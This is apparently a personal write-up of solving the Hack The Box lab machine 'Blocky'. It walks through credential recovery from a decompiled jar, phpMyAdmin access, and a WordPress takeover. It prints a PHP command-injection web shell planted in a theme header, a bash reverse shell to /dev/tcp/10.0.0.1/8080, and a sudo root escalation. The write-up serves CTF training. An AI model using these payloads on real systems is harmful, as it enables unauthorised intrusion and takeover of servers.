Blocky | HTB Machine
Hello everyone today we are going to solve a new machine Blocky, So let’s spawn the machine and get started.
Here is the IP and using my nmap script let’s fetch some information about the services and ports on this machine.
As we can see there are a handful of ports and services open on the machine, my favourite being the minecraft……
Let’s craft a perfect plan to pwn this machine………..
Frist thing first we have an FTP port open an it is running a ProFTPD 1.3.5a since the scan script didn’t show any anonymous login meaning we are clear on that let’s find if this version of ftp is vulnerable
After several tries i could find any vulnerabilities in the ftp server so i moved to the HTTP port and it is important to move ahead instead of getting stuck at a single port, because some times it is just there to waste your time or maybe you require to think some different approach which would be only possible if you move ahead and visit it back after sometime.
upon running the dirsearch command, I found that we have Wordpress running, and phpadmin .
Upon analyzing i saw plugins directory which had some interesting jar files. Upon downloading i unzipped it as well.
Visiting the Web page also revealed some information
There is a post written by the NOTCH, this could be the potential username for the machine.
From the downloaded directories I also found a direcoty named BlockyCore which gave me a class file but it needed to be decompiled.
Upon looking in the internet i Found this link
https://www.benf.org/other/cfr/
Which is for a cmd level decompiler for java/jar files….
I downoaded it and then used a simple command
java -jar cfr-0.152.jar <classfile> > <outputjavafile>
upon running that command I simply cat the java output file it gave me a set of credentials…
I applied and tried to use this credentials in various places because there was no sign of a sql server that i could access directly on the server.
I tried to input this password for admin, root and notch as well.
But no luck there ……
Now if you remember that we had the some endpoints for PHPADMIN so let’s move our focus to that because this seems to be a dead end.
upon visiting the phpMyAdmin, I logged in directly using the same creds …..
I went to wordpress and then to users and I found the credentials for NOTCH…..
Let’s change it for fun, I can use this one as well.
I tried changing it without backing up the previous one and now this one does not work..
I might have broken it or so to find what was wrong when I saw the password it did look like hash meaning that the pass is stored in form of a hash.
Upon searching it on the internet that hwo does phpMyAdmin stores password. I found this…
So let us generate the hash…….
And using the password I logged in to wordpress admin……
Going to themes and then editor I changed the pages header to my php reverse shell code but id did not work as expected……
This seems to be a very unstable connection so what i can try id to do a command injection instead.
I took reference from this site:
<?php system($_GET[‘cmd’]); ?>
I have added the command injection code in the php…..
now with the CMD parameter i can call command on the shell with www-data privilege most likely.
Here we have it running so let us get a reverse shell command and try to spawn a reverse shell……
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
This did not work because while inputting something from the URL directly it encodes the values making your command irrelevant so let us catch this request and then input our command …….
It’s time to burp …… A little burp can fix everything !!
Upon failing sometimes I had to change my php payload to
And then I hit cmd to cath the request and then change the request method to POST, and URL encode the command properly using CTRL+U…
Upon looking around i found this password but it was not usable so I thought why not try it for root and notch….
but due to /bin/bash -i spawned shell I couldn’t
So I hit exit and then spawn a bash shell using python3 as python was not available….
python3 -c 'import pty; pty.spawn("/bin/bash")'
NOW let us first get the user.txt
And when i checked SUDO -l i found that
notch can run any command on the system using sudo
So a simple sudo -i
spawned me a root shell giving me complete control ……
I must say they put a lot of things in the user flag that they gave the root flag complementary …….
Just like that the machine is PWNED and we live another day to hack some more machines …….
My review : Getting the user flag was really some work it included exploiting wordpress and navigation through phpmyadmin as well. And then spawning the shell was also little tricky….. But the root flag was too easy… Overall the machine was good DECOMPILING java file was a good way to start……
